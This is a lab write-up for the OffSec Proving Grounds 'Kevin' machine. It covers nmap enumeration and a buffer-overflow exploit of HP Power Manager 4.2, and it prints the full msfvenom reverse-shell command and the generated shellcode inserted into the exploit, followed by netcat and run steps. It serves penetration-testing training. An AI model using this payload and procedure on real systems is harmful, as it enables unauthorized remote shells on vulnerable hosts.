Skip to content

Latest commit

 

History

History
130 lines (111 loc) · 5.09 KB

2023-08-28-Proving_grounds_Practice-Kevin.md

File metadata and controls

130 lines (111 loc) · 5.09 KB
Raw
title layout date tag writeups hidden author description
Proving grounds Practice: Kevin
post
2023-08-28 01:00
CTF
Offsec labs
OSCP
Writeup
Windows
Pg-Practice
true
true
Naveen
Offsec proving grounds practice windows machine writeup

Nmap

Nmap
PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.174.45/index.asp
| http-methods: 
|_  Supported Methods: GET HEAD
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
3573/tcp  open  tag-ups-1?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC

PORT : 80 : Web

HP Power Manager 4.2 (Build 7)

img

HP Power Manager 4.2 (Build 7) is vulnerable to Buffer Overflow Attack.

Exploitation

Download the Exploit from exploitDB.

Create a shellcode using tun0 IP and local PORT to listen for reverse connection.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.156 LPORT=443  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x64/alpha_mixed --platform windows -f c

Generated Buffer

"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x93\x99\xf7\xc4\x83\xee\xfc\xe2\xf4\x6f\x71\x75\xc4"
"\x93\x99\x97\x4d\x76\xa8\x37\xa0\x18\xc9\xc7\x4f\xc1\x95"
"\x7c\x96\x87\x12\x85\xec\x9c\x2e\xbd\xe2\xa2\x66\x5b\xf8"
"\xf2\xe5\xf5\xe8\xb3\x58\x38\xc9\x92\x5e\x15\x36\xc1\xce"
"\x7c\x96\x83\x12\xbd\xf8\x18\xd5\xe6\xbc\x70\xd1\xf6\x15"
"\xc2\x12\xae\xe4\x92\x4a\x7c\x8d\x8b\x7a\xcd\x8d\x18\xad"
"\x7c\xc5\x45\xa8\x08\x68\x52\x56\xfa\xc5\x54\xa1\x17\xb1"
"\x65\x9a\x8a\x3c\xa8\xe4\xd3\xb1\x77\xc1\x7c\x9c\xb7\x98"
"\x24\xa2\x18\x95\xbc\x4f\xcb\x85\xf6\x17\x18\x9d\x7c\xc5"
"\x43\x10\xb3\xe0\xb7\xc2\xac\xa5\xca\xc3\xa6\x3b\x73\xc6"
"\xa8\x9e\x18\x8b\x1c\x49\xce\xf1\xc4\xf6\x93\x99\x9f\xb3"
"\xe0\xab\xa8\x90\xfb\xd5\x80\xe2\x94\x66\x22\x7c\x03\x98"
"\xf7\xc4\xba\x5d\xa3\x94\xfb\xb0\x77\xaf\x93\x66\x22\x94"
"\xc3\xc9\xa7\x84\xc3\xd9\xa7\xac\x79\x96\x28\x24\x6c\x4c"
"\x60\xae\x96\xf1\x37\x6c\xbe\x05\x9f\xc6\x93\x98\x4c\x4d"
"\x75\xf3\xe7\x92\xc4\xf1\x6e\x61\xe7\xf8\x08\x11\x16\x59"
"\x83\xc8\x6c\xd7\xff\xb1\x7f\xf1\x07\x71\x31\xcf\x08\x11"
"\xfb\xfa\x9a\xa0\x93\x10\x14\x93\xc4\xce\xc6\x32\xf9\x8b"
"\xae\x92\x71\x64\x91\x03\xd7\xbd\xcb\xc5\x92\x14\xb3\xe0"
"\x83\x5f\xf7\x80\xc7\xc9\xa1\x92\xc5\xdf\xa1\x8a\xc5\xcf"
"\xa4\x92\xfb\xe0\x3b\xfb\x15\x66\x22\x4d\x73\xd7\xa1\x82"
"\x6c\xa9\x9f\xcc\x14\x84\x97\x3b\x46\x22\x17\xd9\xb9\x93"
"\x9f\x62\x06\x24\x6a\x3b\x46\xa5\xf1\xb8\x99\x19\x0c\x24"
"\xe6\x9c\x4c\x83\x80\xeb\x98\xae\x93\xca\x08\x11"

Replace the above buffer values in the exploit code.

SHELL = (
"n00bn00b"
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x93\x99\xf7\xc4\x83\xee\xfc\xe2\xf4\x6f\x71\x75\xc4"
"\x93\x99\x97\x4d\x76\xa8\x37\xa0\x18\xc9\xc7\x4f\xc1\x95"
"\x7c\x96\x87\x12\x85\xec\x9c\x2e\xbd\xe2\xa2\x66\x5b\xf8"
"\xf2\xe5\xf5\xe8\xb3\x58\x38\xc9\x92\x5e\x15\x36\xc1\xce"
"\x7c\x96\x83\x12\xbd\xf8\x18\xd5\xe6\xbc\x70\xd1\xf6\x15"
"\xc2\x12\xae\xe4\x92\x4a\x7c\x8d\x8b\x7a\xcd\x8d\x18\xad"
"\x7c\xc5\x45\xa8\x08\x68\x52\x56\xfa\xc5\x54\xa1\x17\xb1"
"\x65\x9a\x8a\x3c\xa8\xe4\xd3\xb1\x77\xc1\x7c\x9c\xb7\x98"
"\x24\xa2\x18\x95\xbc\x4f\xcb\x85\xf6\x17\x18\x9d\x7c\xc5"
"\x43\x10\xb3\xe0\xb7\xc2\xac\xa5\xca\xc3\xa6\x3b\x73\xc6"
"\xa8\x9e\x18\x8b\x1c\x49\xce\xf1\xc4\xf6\x93\x99\x9f\xb3"
"\xe0\xab\xa8\x90\xfb\xd5\x80\xe2\x94\x66\x22\x7c\x03\x98"
"\xf7\xc4\xba\x5d\xa3\x94\xfb\xb0\x77\xaf\x93\x66\x22\x94"
"\xc3\xc9\xa7\x84\xc3\xd9\xa7\xac\x79\x96\x28\x24\x6c\x4c"
"\x60\xae\x96\xf1\x37\x6c\xbe\x05\x9f\xc6\x93\x98\x4c\x4d"
"\x75\xf3\xe7\x92\xc4\xf1\x6e\x61\xe7\xf8\x08\x11\x16\x59"
"\x83\xc8\x6c\xd7\xff\xb1\x7f\xf1\x07\x71\x31\xcf\x08\x11"
"\xfb\xfa\x9a\xa0\x93\x10\x14\x93\xc4\xce\xc6\x32\xf9\x8b"
"\xae\x92\x71\x64\x91\x03\xd7\xbd\xcb\xc5\x92\x14\xb3\xe0"
"\x83\x5f\xf7\x80\xc7\xc9\xa1\x92\xc5\xdf\xa1\x8a\xc5\xcf"
"\xa4\x92\xfb\xe0\x3b\xfb\x15\x66\x22\x4d\x73\xd7\xa1\x82"
"\x6c\xa9\x9f\xcc\x14\x84\x97\x3b\x46\x22\x17\xd9\xb9\x93"
"\x9f\x62\x06\x24\x6a\x3b\x46\xa5\xf1\xb8\x99\x19\x0c\x24"
"\xe6\x9c\x4c\x83\x80\xeb\x98\xae\x93\xca\x08\x11")

Run netcat listerner on the PORT which was used in the above payload.

Run the exploit using python2 and the reverse connetion will be obtained in few seconds.

img

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.